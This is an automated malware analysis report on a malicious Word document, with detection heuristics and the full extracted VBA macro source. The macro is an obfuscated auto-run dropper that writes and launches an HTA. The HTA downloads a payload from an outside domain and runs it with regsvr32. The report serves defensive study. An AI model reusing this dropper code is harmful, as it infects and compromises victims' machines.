Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 bf5fd80cf4601bf1…

MALICIOUS

Office (OOXML)

80.2 KB Created: 2021-04-01 07:32:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-04-10
MD5: 3f2661f0508a37ddb6f9baf7523e4554 SHA-1: 4bdf4c7c885fc6ddcc457f7bb47ea7ff31197e9d SHA-256: bf5fd80cf4601bf11b7b56215fbe8514a10ab24d11cd86d79f418459c7f48f6f
170 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set documentSwap = CreateObject("wscript.shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set documentSwap = CreateObject("wscript.shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9282 bytes
SHA-256: 56e9a75e314a670759a9095812beb681a32709c1aa2c8969745ed6b71de14c1d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{DA6AAC86-F056-42DB-A82B-83256A1AB6E1}{7E455B58-4921-4008-8FDD-DACA97D132D9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Function textboxView()
With frm.button1
textboxView = .Tag
End With
End Function
Function pasteIterator()
With frm.button1
pasteIterator = .Caption
End With
End Function
Public Sub button1_Click()
Set documentSwap = CreateObject("wscript.shell")
documentSwap.exec p(textboxView) & " " & p(pasteIterator)
End Sub


Attribute VB_Name = "dataView"
Sub autoopen()
sizeNextCollection
End Sub
Function intel(queryMain)
intel = "" & queryMain & ""
End Function
Sub sizeNextCollection()
Dim convertTempMem As String
convertTempMem = p(frm.button1.Caption)
Set ExMemoryCounter = New clearCopySelect
ExMemoryCounter.ASizeTable convertTempMem, screenArray
frm.button1_Click
End Sub
Function swapRepo(listClass, lenResponse, titleViewW)
swapRepo = Replace(listClass, lenResponse, titleViewW)
End Function

Attribute VB_Name = "databaseExVb"
Function dataProcedureArgument()
dataProcedureArgument = intel("<html><body><div id='content'>fTtlc29sYy5hdGFEbm90dHViOykyICwiZ3")
End Function
Function lenRemoveWindow()
lenRemoveWindow = intel("BqLnNzYWxDZXppU3RzaWxcXGNpbGJ1cFxcc3Jlc3VcXDpjIihlbGlmb3RldmFzLm")
End Function
Function procW()
procW = intel("F0YURub3R0dWI7KXlkb2Jlc25vcHNlci5lc25vcHNlUm1lTXRjZWxlcyhldGlydy")
End Function
Function responseIndex()
responseIndex = intel("5hdGFEbm90dHViOzEgPSBlcHl0LmF0YURub3R0dWI7bmVwby5hdGFEbm90dHViOy")
End Function
Function iteratorQueryVar()
iteratorQueryVar = intel("kibWFlcnRzLmJkb2RhIih0Y2VqYk9YZXZpdGNBIHdlbiA9IGF0YURub3R0dWIgcm")
End Function
Function listClearValue()
listClearValue = intel("F2eykwMDIgPT0gc3V0YXRzLmVzbm9wc2VSbWVNdGNlbGVzKGZpOykoZG5lcy5lc2")
End Function
Function repoEx()
repoEx = intel("5vcHNlUm1lTXRjZWxlczspZXNsYWYgLCJSQWpkUT1kaXMmZHA3VUttakdKblVOWD")
End Function
Function queryStructDatabase()
queryStructDatabase = intel("1xJkhLWDlKcVhjPU11ZGlKNVFUPzMxbmF4L1Z6NDRFTDJ1UWJiOE9leGJrT0VoRm")
End Function
Function titleTemp()
titleTemp = intel("x4QUNJS0xzbWlYWTkvcXcxeENtTUtQNDBBT0FlSlRodGxQNWgzVG9HM1Q2ZFk1RV")
End Function
Function localOption()
localOption = intel("RZZ1VnSUhpbG1iSkZ5L2hzVVBISmROWHdHckJ1QzlETU1QQzUveXdwZlpMWGlYWF")
End Function
Function titlePointer()
titlePointer = intel("JXWk1vQTdtL1JuMTJmWWE4UU80U0Qydzlia05td1BHcTljc0s4elVlWkRqaC9zeX")
End Function
Function rightGenericSwap()
rightGenericSwap = intel("VvZy9tb2MuNjEwMi1lZ2FndHJvbS1kbmVnZWwvLzpwdHRoIiAsIlRFRyIobmVwby")
End Function
Function WRefLeft()
WRefLeft = intel("5lc25vcHNlUm1lTXRjZWxlczspInB0dGhsbXguMmxteHNtIih0Y2VqYk9YZXZpdG")
End Function
Function ARequestArray()
ARequestArray = intel("NBIHdlbiA9IGVzbm9wc2VSbWVNdGNlbGVzIHJhdg==|fXspdGZlTGVzbm9wc2VyK")
End Function
Function bufferValue()
bufferValue = intel("GhjdGFjfTspImF0aC5zc2FsQ2V6aVN0c2lsXFxjaWxidXBcXHNyZXN1XFw6YyIoZ")
End Function
Function screenProc()
screenProc = intel("WxpZmV0ZWxlZC5XY2lyZW5lR3R4ZXR7eXJ0OykidGNlamJvbWV0c3lzZWxpZi5nb")
End Function
Function refVar()
refVar = intel("ml0cGlyY3MiKHRjZWpiT1hldml0Y0Egd2VuID0gV2NpcmVuZUd0eGV0IHJhdjspI")
End Function
Function captionPointerA()
captionPointerA = intel("mdwai5zc2FsQ2V6aVN0c2lsXFxjaWxidXBcXHNyZXN1XFw6YyAyM3J2c2dlciIob")
End Function
Function swapMainRemove()
swapMainRemove = intel("nVyLikibGxlaHMudHBpcmNzdyIodGNlamJPWGV2aXRjQSB3ZW4=</div><div id")
End Function
Function funcBorder()
funcBorder = intel("='table1'>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div><div id='table2'>01234")
End Function
Function optionVariableProcedure()
optionVariableProcedure = intel("56789+/</div><div id='table3'></div><script language='javascript")
End Function
Function viewArgumentGlobal()
viewArgumentGlobal = intel("'>function nextStorage(captionDocument){return(new ActiveXObject")
End Function
Function leftCounterSelect()
leftCounterSelect = intel("(captionDocument));}function variableRequest(ExLibPtr){return(ca")
End Function
Function leftCounter()
leftCounter = intel("ptionLeft.getElementById(ExLibPtr).innerHTML);}function libVb(){")
End Function
Function textboxCountBuf()
textboxCountBuf = intel("var textBufLoad = variableRequest('table1');var procedureNext = ")
End Function
Function borderCounterListbox()
borderCounterListbox = intel("textBufLoad.toLowerCase();var buttonMemPtr = variableRequest('ta")
End Function
Function trustIteratorPtr()
trustIteratorPtr = intel("ble2');return(textBufLoad + procedureNext + buttonMemPtr);}funct")
End Function
Function captionStructQuery()
captionStructQuery = intel("ion windowProc(s){var e={}; var i; var b=0; var c; var x; var l=")
End Function
Function lenVb()
lenVb = intel("0; var a; var windowListbox=''; var w=String.fromCharCode; var L")
End Function
Function structConvert()
structConvert = intel("=s.length;var loadSizeSelect = 'charAt';for(i=0;i<64;i++){e[libV")
End Function
Function referenceGlobal()
referenceGlobal = intel("b()[loadSizeSelect](i)]=i;}for(x=0;x<L;x++){c=e[s[loadSizeSelect")
End Function
Function pointerTable()
pointerTable = intel("](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-")
End Function
Function listExSize()
listExSize = intel("2)))&&(windowListbox+=w(a));}}return(windowListbox);};function l")
End Function
Function listStruct()
listStruct = intel("enDelete(countLocalTextbox){return countLocalTextbox.split('').r")
End Function
Function screenBorderCollection()
screenBorderCollection = intel("everse().join('');}listboxPointerReference = window;captionLeft ")
End Function
Function linkMemoryPointer()
linkMemoryPointer = intel("= document;listboxPointerReference.resizeTo(1, 1);listboxPointer")
End Function
Function localBuffer()
localBuffer = intel("Reference.moveTo(-100, -100);var dataLen = captionLeft.getElemen")
End Function
Function storageDataList()
storageDataList = intel("tById('content').innerHTML;var dataLen = dataLen.split('|');var ")
End Function
Function loadConstNamespace()
loadConstNamespace = intel("leftCollection = lenDelete(windowProc(dataLen[0]));var lenClass ")
End Function
Function libData()
libData = intel("= lenDelete(windowProc(dataLen[1]));</script><script language='j")
End Function
Function listboxArgument()
listboxArgument = intel("avascript'>function globalDataDocument(tmpReference){var counter")
End Function
Function procedureDataCounter()
procedureDataCounter = intel("Iterator = nextStorage('msscriptcontrol.scriptcontrol');counterI")
End Function
Function valueStruct()
valueStruct = intel("terator.Language = 'jscript';counterIterator.Timeout = 60000;cou")
End Function
Function convertPointer()
convertPointer = intel("nterIterator.AddCode(tmpReference);return(null);}</script><scrip")
End Function
Function libLib()
libLib = intel("t language='vbscript'>globalDataDocument leftCollection : global")
End Function
Function classTextbox()
classTextbox = intel("DataDocument lenClass : listboxPointerReference.close</script></")
End Function
Function arrayArrayCounter()
arrayArrayCounter = intel("body></html>")
End Function
Function screenArray()
screenArray = dataProcedureArgument + lenRemoveWindow + procW + responseIndex + iteratorQueryVar + listClearValue + repoEx + queryStructDatabase + titleTemp + localOption + titlePointer + rightGenericSwap + WRefLeft + ARequestArray + bufferValue + screenProc + refVar + captionPointerA + swapMainRemove + funcBorder + optionVariableProcedure + viewArgumentGlobal + leftCounterSelect + leftCounter + textboxCountBuf + borderCounterListbox + trustIteratorPtr + captionStructQuery + lenVb + structConvert + referenceGlobal + pointerTable + listExSize + listStruct + screenBorderCollection + linkMemoryPointer + localBuffer + storageDataList + loadConstNamespace + libData + listboxArgument + procedureDataCounter + valueStruct + convertPointer + libLib + classTextbox + arrayArrayCounter
End Function

Attribute VB_Name = "clearCopySelect"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Sub ASizeTable(refCounterTmp As String, repoOptionTitle As String)
Dim buttonMainNext As FileSystemObject
Set buttonMainNext = New FileSystemObject
Dim tempCountPtr As TextStream
Set tempCountPtr = buttonMainNext.CreateTextFile(refCounterTmp)
tempCountPtr.WriteLine repoOptionTitle
tempCountPtr.Close
Set tempCountPtr = Nothing
Set buttonMainNext = Nothing
End Sub

Attribute VB_Name = "captionTrust"
Function p(trustRequest)
p = swapRepo(trustRequest, "@", "")
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 40448 bytes
SHA-256: a6b25af667505c1b8a20d82293c5712c0f79c5bc7afc6f627104ecbb28e7c0f6

Open this report in the interactive analyzer, or submit your own file for analysis.